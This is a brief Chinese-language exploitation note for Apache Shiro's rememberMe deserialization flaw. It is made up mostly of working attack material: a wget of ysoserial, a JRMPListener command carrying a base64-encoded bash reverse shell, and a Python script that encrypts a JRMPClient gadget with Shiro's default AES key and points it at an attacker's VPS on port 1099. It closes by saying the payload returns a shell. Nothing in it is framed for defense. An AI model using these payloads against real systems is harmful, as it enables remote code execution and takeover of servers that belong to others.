一、漏洞利用
wget https://raw.githubusercontent.com/sv3nbeast/ShiroScan/master/moule/ysoserial.jar
反弹shell需要base64加密:http://www.jackson-t.ca/runtime-exec-payloads.html
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "bash -c {echo, base64}|{base64,-d}|{bash,-i}"
python shiro.py vps:1099 生成payload
import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial-master-v0.0.5-g16fc48b-20.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
payload = encode_rememberme(sys.argv[1])
print(payload)反弹执行获取shell